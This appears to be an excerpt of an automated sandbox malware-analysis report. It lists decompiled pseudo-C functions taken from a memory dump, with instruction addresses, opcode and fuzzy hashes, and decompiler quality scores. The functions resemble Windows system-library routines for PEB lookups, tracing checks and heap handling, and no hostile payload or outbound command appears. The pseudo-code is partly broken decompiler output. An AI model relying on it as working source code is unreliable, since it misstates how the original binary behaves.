					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01677D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E016D7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                      0x0166b037
                                                      0x0166b039
                                                      0x0166b03b
                                                      0x0166b040
                                                      0x016ba60e
                                                      0x00000000
                                                      0x00000000
                                                      0x016ba61d
                                                      0x0166b04b
                                                      0x0166b04e
                                                      0x016ba627
                                                      0x016ba634
                                                      0x00000000
                                                      0x00000000
                                                      0x016ba641
                                                      0x016ba653
                                                      0x016ba643
                                                      0x016ba64c
                                                      0x016ba64c
                                                      0x016ba65b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016ba66c
                                                      0x0166b057
                                                      0x0166b057
                                                      0x0166b057
                                                      0x0166b046
                                                      0x0166b046
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                      • Instruction ID: c35c5a9959d95c70c88d83e7f126113f78e04ba908bf910f823e8c13314d3087
                                                      • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                      • Instruction Fuzzy Hash: FC017172300584DFE326875CCD88F667BDCEB95654F0900A1EA15CB751E728DC81C625
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0170FE3F, Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 59%
                                                      			E0170FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x174d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0169FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E01677D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0169B640(E01699AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                      0x0170fe3f
                                                      0x0170fe3f
                                                      0x0170fe4e
                                                      0x0170fe58
                                                      0x0170fe5d
                                                      0x0170fe5f
                                                      0x0170fe6a
                                                      0x0170fe72
                                                      0x0170fe75
                                                      0x0170fe78
                                                      0x0170fe83
                                                      0x0170fe95
                                                      0x0170fe85
                                                      0x0170fe8e
                                                      0x0170fe8e
                                                      0x0170fea0
                                                      0x0170fea1
                                                      0x0170fea3
                                                      0x0170fea8
                                                      0x0170febd

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6fdfa74788f6330762edd6f39912d499c4fd09e4bf2e7fc66b00a5b7c1946c5d
                                                      • Instruction ID: 3166f56050ea5f9ccda2e605a319f9618956778c02a002c795e845fbbfb4e1c9
                                                      • Opcode Fuzzy Hash: 6fdfa74788f6330762edd6f39912d499c4fd09e4bf2e7fc66b00a5b7c1946c5d
                                                      • Instruction Fuzzy Hash: 25018471A04219ABDB24DFA9D845FAEBBB9EF54B10F00406AF900EB281DA749901C798
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0170FEC0, Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 59%
                                                      			E0170FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x174d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0169FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E01677D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0169B640(E01699AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                      0x0170fec0
                                                      0x0170fec0
                                                      0x0170fecf
                                                      0x0170fed9
                                                      0x0170fede
                                                      0x0170fee0
                                                      0x0170feeb
                                                      0x0170fef3
                                                      0x0170fef6
                                                      0x0170fef9
                                                      0x0170ff04
                                                      0x0170ff16
                                                      0x0170ff06
                                                      0x0170ff0f
                                                      0x0170ff0f
                                                      0x0170ff21
                                                      0x0170ff22
                                                      0x0170ff24
                                                      0x0170ff29
                                                      0x0170ff3e

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dcd478fb8f9e1bc31362e86c57310ebdd657121a671235c6faad57d9e9d89866
                                                      • Instruction ID: 7b373ce34f233f2320ed5b0b5f9ca96add3b6441a35a7982f64ced883e4fd27f
                                                      • Opcode Fuzzy Hash: dcd478fb8f9e1bc31362e86c57310ebdd657121a671235c6faad57d9e9d89866
                                                      • Instruction Fuzzy Hash: A4018871A00219ABDB14DBA9D845FAEBBB9EF54710F00406AF900DB380DA749901C7D8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01728A62, Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E01728A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x174d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01677D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0169B640(E01699AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                      0x01728a62
                                                      0x01728a71
                                                      0x01728a79
                                                      0x01728a82
                                                      0x01728a85
                                                      0x01728a89
                                                      0x01728a8c
                                                      0x01728a8f
                                                      0x01728a92
                                                      0x01728a95
                                                      0x01728a9f
                                                      0x01728ab1
                                                      0x01728aa1
                                                      0x01728aaa
                                                      0x01728aaa
                                                      0x01728abc
                                                      0x01728abd
                                                      0x01728abf
                                                      0x01728ac4
                                                      0x01728ada

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1f1f914d2972a4d9b056db42505832ce129690dc5478fa19963e47cb3246f585
                                                      • Instruction ID: 313219228b7f6721f50bd0eda2bd68dc419212987cbbb92dffcd67187ea5be87
                                                      • Opcode Fuzzy Hash: 1f1f914d2972a4d9b056db42505832ce129690dc5478fa19963e47cb3246f585
                                                      • Instruction Fuzzy Hash: 9E012C71A0021DAFCB00DFA9D9419AEBBF8EF58710F10405AF904E7341EA34AA01CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01728ED6, Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E01728ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x174d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E01677D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0169B640(E01699AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                      0x01728ed6
                                                      0x01728ee5
                                                      0x01728eed
                                                      0x01728ef0
                                                      0x01728efa
                                                      0x01728f03
                                                      0x01728f0c
                                                      0x01728f15
                                                      0x01728f24
                                                      0x01728f27
                                                      0x01728f31
                                                      0x01728f43
                                                      0x01728f33
                                                      0x01728f3c
                                                      0x01728f3c
                                                      0x01728f4e
                                                      0x01728f4f
                                                      0x01728f51
                                                      0x01728f56
                                                      0x01728f69

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7cf1c8f9ea10654237cd6f0b1fbc62086c26f0ab95a7fdf951e12f2ac41a6ec8
                                                      • Instruction ID: 52e7082e51bc298addeb571a1bb8a252e669bc01639aa3b2734d9d8fc0369989
                                                      • Opcode Fuzzy Hash: 7cf1c8f9ea10654237cd6f0b1fbc62086c26f0ab95a7fdf951e12f2ac41a6ec8
                                                      • Instruction Fuzzy Hash: 74111E71A002599FDB04DFA8D841FAEFBF4FF08300F0442AAE918EB381E6349941CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0165DB60, Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0165DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0165DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0165E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0165E8B0(__ecx, _t14, 0xfff);
							L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                      0x0165db64
                                                      0x0165db66
                                                      0x0165db6b
                                                      0x0165dbaa
                                                      0x0165db71
                                                      0x0165db76
                                                      0x0165db7a
                                                      0x0165dba3
                                                      0x0165db7c
                                                      0x0165db87
                                                      0x0165db8b
                                                      0x016b4fa1
                                                      0x016b4fb3
                                                      0x016b4fb8
                                                      0x0165db91
                                                      0x0165db96
                                                      0x0165db98
                                                      0x0165db98
                                                      0x0165db8b
                                                      0x0165db7a
                                                      0x0165db9d
                                                      0x0165dba2

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                      • Instruction ID: b22afa21d1034c1ec40131f507f226c0ef9ba18c6fb15783f646d584f2fcd390
                                                      • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                      • Instruction Fuzzy Hash: F8F0C8B36015239BD7725AD98C84B67BAAB8FD1AA1F160039FA059B384CB60880286D4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0165B1E1, Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0165B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01677D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01677D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E016D7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                      0x0165b1e8
                                                      0x0165b1ea
                                                      0x0165b1f3
                                                      0x016b4a17
                                                      0x0165b1f9
                                                      0x0165b1f9
                                                      0x0165b1f9
                                                      0x0165b201
                                                      0x016b4a21
                                                      0x016b4a2e
                                                      0x00000000
                                                      0x00000000
                                                      0x016b4a3b
                                                      0x016b4a4d
                                                      0x016b4a3d
                                                      0x016b4a46
                                                      0x016b4a46
                                                      0x016b4a55
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0165b20a
                                                      0x0165b20a
                                                      0x0165b20a
                                                      0x0165b20a

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                      • Instruction ID: 19714e2d93d398c7107a1cb7ff065e69aa077bfa77de8f015cec3fa4a6fa97a2
                                                      • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                      • Instruction Fuzzy Hash: 0F01A9332005849BD322975DCC48FA97F9AEF51794F094065FE158B7B2DB75C841C329
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016EFE87, Relevance: .0, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 46%
                                                      			E016EFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x174d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E01677D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0169B640(E01699AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                      0x016efe96
                                                      0x016efe9e
                                                      0x016efea1
                                                      0x016efead
                                                      0x016efeb3
                                                      0x016efeb9
                                                      0x016efec3
                                                      0x016efed5
                                                      0x016efec5
                                                      0x016efece
                                                      0x016efece
                                                      0x016efee0
                                                      0x016efee1
                                                      0x016efee3
                                                      0x016efee8
                                                      0x016efefb

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b5e23b9d9fe12777630475e44ac46493033f854668f601a6f71fcb9012443312
                                                      • Instruction ID: c0a0dd29b061664013401967971984718b726c49a3af6e3c6eda0b48fe8c2e1a
                                                      • Opcode Fuzzy Hash: b5e23b9d9fe12777630475e44ac46493033f854668f601a6f71fcb9012443312
                                                      • Instruction Fuzzy Hash: 94016271A00209EFCB14DFA8D945A6EB7F4EF14704F104199A904EB382D635E901CB84
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0171131B, Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 48%
                                                      			E0171131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x174d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01677D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0169B640(E01699AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                      0x0171131b
                                                      0x0171132a
                                                      0x01711330
                                                      0x01711336
                                                      0x0171133e
                                                      0x01711341
                                                      0x01711344
                                                      0x0171134f
                                                      0x01711361
                                                      0x01711351
                                                      0x0171135a
                                                      0x0171135a
                                                      0x0171136c
                                                      0x0171136d
                                                      0x0171136f
                                                      0x01711374
                                                      0x01711387

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c7edd0113c76d3627aa6337e4a7c351106353d9d0680528b87fc2fbaa81b7ee
                                                      • Instruction ID: 9722d5692f66801a5e2ed6d03a9ab04869acb4b3a346bbedd59c4873b5e7378c
                                                      • Opcode Fuzzy Hash: 4c7edd0113c76d3627aa6337e4a7c351106353d9d0680528b87fc2fbaa81b7ee
                                                      • Instruction Fuzzy Hash: 7D013C71A01209AFCB14EFE9D945AAEB7F5FF18700F40805AB945EB381E634AA00CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01728F6A, Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 48%
                                                      			E01728F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x174d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E01677D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0169B640(E01699AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                      0x01728f6a
                                                      0x01728f79
                                                      0x01728f81
                                                      0x01728f84
                                                      0x01728f8b
                                                      0x01728f91
                                                      0x01728f94
                                                      0x01728f9e
                                                      0x01728fb0
                                                      0x01728fa0
                                                      0x01728fa9
                                                      0x01728fa9
                                                      0x01728fbb
                                                      0x01728fbc
                                                      0x01728fbe
                                                      0x01728fc3
                                                      0x01728fd6

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: edd2d21d5e1d5bcd33411c8db83b59fe3c01f3830e7af4104be78344c80450e0
                                                      • Instruction ID: 058a8a9252f8834762333a6e0c3f673b4618cc0f942a0037a7217cd4d2abf39a
                                                      • Opcode Fuzzy Hash: edd2d21d5e1d5bcd33411c8db83b59fe3c01f3830e7af4104be78344c80450e0
                                                      • Instruction Fuzzy Hash: B5013175A00219AFDB10DFA8D945EAEB7F5EF18300F104059F905EB380EA34DA00CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01711608, Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 46%
                                                      			E01711608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x174d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E01677D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0169B640(E01699AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                      0x01711608
                                                      0x01711617
                                                      0x0171161d
                                                      0x01711625
                                                      0x01711628
                                                      0x0171162b
                                                      0x01711636
                                                      0x01711648
                                                      0x01711638
                                                      0x01711641
                                                      0x01711641
                                                      0x01711653
                                                      0x01711654
                                                      0x01711656
                                                      0x0171165b
                                                      0x0171166e

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1d821437bc51a80ab9d5390f06b080181665d7008f2d94c524afe9e026f92a51
                                                      • Instruction ID: 7869400766b205286d7a08ea40ccb49ee76e569c1209d154785b2672a8288efb
                                                      • Opcode Fuzzy Hash: 1d821437bc51a80ab9d5390f06b080181665d7008f2d94c524afe9e026f92a51
                                                      • Instruction Fuzzy Hash: 4AF06271A00258EFDB14DFE8D805E6EB7F8EF14300F444069A905EB381EA349900CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0167C577, Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0167C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0167C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x16311cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E017288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                      0x0167c577
                                                      0x0167c57d
                                                      0x0167c581
                                                      0x0167c5b5
                                                      0x0167c5b9
                                                      0x0167c5ce
                                                      0x0167c5ce
                                                      0x0167c5ca
                                                      0x00000000
                                                      0x0167c5ca
                                                      0x0167c5c4
                                                      0x0167c5c8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0167c5ad
                                                      0x00000000
                                                      0x0167c5af

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 08e0d4108edc3afe0ca3128465e231ea2befae7b26dfeb0ddfd3a61a8fa34234
                                                      • Instruction ID: ef8fe79c1a3e4b1207077cb9f748a2f45b222329c661231f26eba508ea2a6027
                                                      • Opcode Fuzzy Hash: 08e0d4108edc3afe0ca3128465e231ea2befae7b26dfeb0ddfd3a61a8fa34234
                                                      • Instruction Fuzzy Hash: 35F09AB2915AA3DEF7368B2C8844B22BFE89B05770F54896AD50687302C7A6DCA0C251
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01712073, Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E01712073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0170FD22(__ecx);
				_t19 =  *0x174849c - _t3; // 0x4d0d9301
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1748748; // 0x0
					if(__eflags <= 0) {
						E01711C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1748724 & 0x00000004;
							if(( *0x1748724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1748724; // 0x0
					return E01708DF1(__ebx, 0xc0000374, 0x1745890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                      0x01712076
                                                      0x01712078
                                                      0x0171207d
                                                      0x01712083
                                                      0x017120a4
                                                      0x017120aa
                                                      0x017120ac
                                                      0x017120b7
                                                      0x017120ba
                                                      0x017120bc
                                                      0x017120c9
                                                      0x017120c9
                                                      0x017120d0
                                                      0x017120d2
                                                      0x00000000
                                                      0x017120d2
                                                      0x017120be
                                                      0x017120c3
                                                      0x017120c5
                                                      0x017120c7
                                                      0x00000000
                                                      0x00000000
                                                      0x017120c7
                                                      0x017120bc
                                                      0x017120d4
                                                      0x01712085
                                                      0x01712085
                                                      0x017120a3
                                                      0x017120a3

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d23b8e5bea226fa0ed03a2f39176f8270401169319adbb3a74e2b3e530650ae4
                                                      • Instruction ID: 490ff2f3c8aab9fc016e00d0e4172e0f6f3caa153dcf88727fad83005f17a28f
                                                      • Opcode Fuzzy Hash: d23b8e5bea226fa0ed03a2f39176f8270401169319adbb3a74e2b3e530650ae4
                                                      • Instruction Fuzzy Hash: 19F0A76E41518D8BDF339FBC65152D1FBD5D755120B294586D5501720FC634C893CB21
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0169927A, Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E0169927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0169FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E016992C6(_t11, _t14);
				}
				return _t11;
			}





                                                      0x01699295
